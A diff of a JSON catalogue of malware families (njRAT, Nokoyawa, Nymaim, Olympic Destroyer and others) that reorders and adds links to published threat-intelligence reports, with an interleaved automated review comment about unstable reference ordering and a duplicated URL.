- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
+ "https://blogs.360.cn/post/APT-C-44.html",
+ "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://asec.ahnlab.com/1369",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://forensicitguy.github.io/njrat-installed-from-msi/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware",
 "https://blog.talosintelligence.com/2021/07/sidecopy.html",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html"
+ "https://intel471.com/blog/privateloader-malware",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
+ "https://attack.mitre.org/groups/G0096",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
+ "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
+ "https://labs.k7computing.com/?p=21904",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf",
+ "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/",
+ "https://ti.360.net/blog/articles/analysis-of-apt-c-27/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://twitter.com/ESETresearch/status/1449132020613922828",
+ "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
+ "https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/",
+ "https://www.4hou.com/posts/VoPM",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf"
 ],
 "synonyms": [
 "Bladabindi",
@@ -36045,14 +37704,27 @@
 "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a",
 "value": "Nocturnal Stealer"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.node_stealer",
+ "https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e7890226-7e39-4902-bbce-e384e0847303",
+ "value": "NodeStealer"
+ },
 {
 "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki",
+ "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/",
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/"
 ],
 "synonyms": [],
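Review bot: The Nokki `refs` change in this hunk only moves the Unit 42 URL from fourth to first position, and the same pure reordering recurs in almost every hunk below (Nokoyawa, Nullmixer, Nymaim, Olympic Destroyer, Orcus RAT and others), which suggests the generator emits `refs` in an unstable order. Emitting them in a stable order — the Malpedia entry first, the remaining URLs sorted — would confine future refreshes to real additions, removals and description changes, and would make duplicates visible at review time: the njRAT list in the preceding hunk now carries the SideCopy PDF twice, once with and once without the `?1625657388` suffix, which is easy to miss in a shuffled diff. The Nokki description's "is believe to evolve" is an untouched context line here, but worth correcting at the source before the next regeneration.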
@@ -36066,11 +37738,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa",
- "https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
 "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust",
- "https://malgamy.github.io/malware-analysis/Nokoyawa/",
 "https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html",
+ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/",
+ "https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust",
+ "https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/",
+ "https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant",
+ "https://malgamy.github.io/malware-analysis/Nokoyawa/",
 "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
 "https://github.com/MalGamy/YARA_Rules/blob/main/Nokoyawa.yara"
 ],
@@ -36085,8 +37760,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nominatus_toxic_battery",
- "https://twitter.com/struppigel/status/1501473254787198977",
- "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html"
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html",
+ "https://twitter.com/struppigel/status/1501473254787198977"
 ],
 "synonyms": [],
 "type": []
@@ -36094,6 +37769,19 @@
 "uuid": "2fef9561-e16f-47a9-90c6-a68a1b20cc95",
 "value": "NominatusToxicBattery"
 },
+ {
+ "description": "Ransomware",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nopyfy",
+ "https://labs.k7computing.com/index.php/say-no-to-nopyfy/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "62fe621a-04aa-4b5d-95d7-c1c3e4bcd17c",
+ "value": "Nopyfy"
+ },
 {
 "description": "An open source C2 framework intended for pentest and red teaming activities.",
 "meta": {
@@ -36108,7 +37796,7 @@
 "value": "NorthStar"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Nosu is the name of a malicious program classified as a stealer. This malware is designed to steal information from infected machines. The Nosu stealer can extract a wide variety of data from devices and installed applications. The most active campaigns associated with Nosu were noted in North and South America, as well as Southeast Asia.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu",
@@ -36152,8 +37840,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom",
 "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/",
- "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
- "https://twitter.com/malwrhunterteam/status/910952333084971008"
+ "https://twitter.com/malwrhunterteam/status/910952333084971008",
+ "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin"
 ],
 "synonyms": [],
 "type": []
@@ -36180,11 +37868,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer",
- "https://www.youtube.com/watch?v=v_K_zoPGpdk",
 "https://www.youtube.com/watch?v=yLQfDk3dVmA",
- "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://www.youtube.com/watch?v=v_K_zoPGpdk",
 "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
- "https://www.youtube.com/watch?v=92jKJ_G_6ho"
+ "https://www.youtube.com/watch?v=92jKJ_G_6ho",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/"
 ],
 "synonyms": [],
 "type": []
@@ -36193,12 +37881,12 @@
 "value": "Nullmixer"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Numando is a banking trojan written in the Delphi programming language. As the malicious program's classification implies, it is designed to steal banking information. Numando primarily targets Brazil, with seldom campaigns occurring in Mexico and Spain.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.numando",
- "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/",
- "https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/"
+ "https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/",
+ "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/"
 ],
 "synonyms": [],
 "type": []
@@ -36211,9 +37899,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit",
- "http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf",
+ "https://twitter.com/Bank_Security/status/1134850646413385728",
 "https://twitter.com/r3c0nst/status/1135606944427905025",
- "https://twitter.com/Bank_Security/status/1134850646413385728"
+ "http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -36226,9 +37914,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nworm",
+ "https://bazaar.abuse.ch/browse/tag/N-W0rm/",
 "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/",
- "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/",
- "https://bazaar.abuse.ch/browse/tag/N-W0rm/"
+ "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/"
 ],
 "synonyms": [
 "NWorm",
@@ -36244,22 +37932,23 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim",
- "https://blog.talosintelligence.com/goznym/",
- "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/",
 "https://www.sentinelone.com/blog/goznym-banking-malware-gang-busted/",
- "https://www.cert.pl/en/news/single/nymaim-revisited/",
- "https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/",
 "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
- "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0",
- "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim",
- "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/",
- "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
+ "https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/",
 "https://www.lawfareblog.com/what-point-these-nation-state-indictments",
- "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
+ "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0",
+ "https://www.cert.pl/en/news/single/nymaim-revisited/",
+ "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
+ "https://blog.talosintelligence.com/goznym/",
+ "https://bitbucket.org/daniel_plohmann/idapatchwork",
 "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
+ "https://www.virusbulletin.com/conference/vb2017/abstracts/linking-xpaj-and-nymaim",
 "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled",
- "https://bitbucket.org/daniel_plohmann/idapatchwork"
+ "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/",
+ "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim",
+ "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf",
+ "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/"
 ],
 "synonyms": [
 "nymain"
@@ -36288,19 +37977,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat",
- "https://securelist.com/transparent-tribe-part-2/98233/",
 "https://www.secrss.com/articles/24995",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
- "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
- "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
- "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
- "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
 "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html",
+ "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
+ "https://securelist.com/transparent-tribe-part-2/98233/",
+ "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
+ "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
+ "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
 ],
 "synonyms": [],
 "type": []
@@ -36322,6 +38011,19 @@
 "uuid": "8f623a37-80a4-4240-9586-6ea7a2a97e30",
 "value": "Obscene"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer",
+ "https://medium.com/@cyberhust1er/observerstealer-unmasking-the-new-contender-in-cyber-crime-6e54a40d801d"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9ddbf63f-c9a2-4bd6-8449-189f2d2ce5e4",
+ "value": "ObserverStealer"
+ },
 {
 "description": "",
 "meta": {
@@ -36340,10 +38042,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus",
- "https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf",
+ "https://securelist.com/octopus-infested-seas-of-central-asia/88200/",
 "https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw",
- "https://isc.sans.edu/diary/26918",
- "https://securelist.com/octopus-infested-seas-of-central-asia/88200/"
+ "https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf",
+ "https://isc.sans.edu/diary/26918"
 ],
 "synonyms": [],
 "type": []
@@ -36385,8 +38087,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff",
- "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
 ],
 "synonyms": [],
 "type": []
@@ -36399,10 +38101,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
 "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
+ "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/"
 ],
 "synonyms": [],
 "type": []
@@ -36415,9 +38117,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait",
- "https://www.secjuice.com/fancy-bear-review/",
 "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf"
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
+ "https://www.secjuice.com/fancy-bear-review/"
 ],
 "synonyms": [
 "Sasfis"
@@ -36432,30 +38134,30 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer",
- "https://www.youtube.com/watch?v=rjA0Vf75cYk",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
- "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
- "https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
- "https://www.youtube.com/watch?v=1jgdMY12mI8",
- "https://www.youtube.com/watch?v=wCv9SiSA7Sw",
- "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/",
 "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/",
- "https://securelist.com/the-devils-in-the-rich-header/84348/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.youtube.com/watch?v=a4BZ3SZN-CI",
- "https://attack.mitre.org/groups/G0034",
- "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/",
- "https://securelist.com/olympic-destroyer-is-still-alive/86169/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.mbsd.jp/blog/20180215.html",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
- "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
 "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
+ "https://www.youtube.com/watch?v=wCv9SiSA7Sw",
+ "https://www.youtube.com/watch?v=a4BZ3SZN-CI",
+ "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
+ "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
+ "https://www.mbsd.jp/blog/20180215.html",
+ "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/",
+ "https://attack.mitre.org/groups/G0034",
+ "https://securelist.com/the-devils-in-the-rich-header/84348/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
 "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too"
+ "https://www.youtube.com/watch?v=1jgdMY12mI8",
+ "https://www.youtube.com/watch?v=rjA0Vf75cYk",
+ "https://securelist.com/olympic-destroyer-is-still-alive/86169/",
+ "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
+ "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
+ "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/"
 ],
 "synonyms": [
 "SOURGRAPE"
@@ -36470,8 +38172,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat",
- "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators",
- "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview"
+ "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview",
+ "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators"
 ],
 "synonyms": [],
 "type": []
@@ -36497,11 +38199,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke",
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
 "https://www.f-secure.com/weblog/archives/00002764.html",
- "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
 "https://blog.f-secure.com/podcast-dukes-apt29/",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
+ "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/"
 ],
 "synonyms": [],
 "type": []
@@ -36514,9 +38216,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner",
- "https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet",
- "https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html",
 "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/",
+ "https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html",
+ "https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet",
 "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html"
 ],
 "synonyms": [
@@ -36533,10 +38235,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
 "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
 "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
 "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
 ],
 "synonyms": [],
@@ -36550,9 +38252,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki",
- "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html",
- "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html",
 "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519",
+ "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html",
+ "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html",
 "https://forum.malekal.com/viewtopic.php?t=21806"
 ],
 "synonyms": [],
@@ -36587,6 +38289,19 @@
 "uuid": "03d44ec8-ebb4-4d90-9773-c11f4a7de074",
 "value": "OpenSUpdater"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot",
+ "https://www.sentinelone.com/labs/comrades-in-arms-north-korea-compromises-sanctioned-russian-missile-engineering-company/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7fb5882e-1682-45d3-9dfb-204e6c1ca4c9",
+ "value": "OpenCarrot"
+ },
 {
 "description": "This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.",
 "meta": {
@@ -36631,8 +38346,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat",
- "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood",
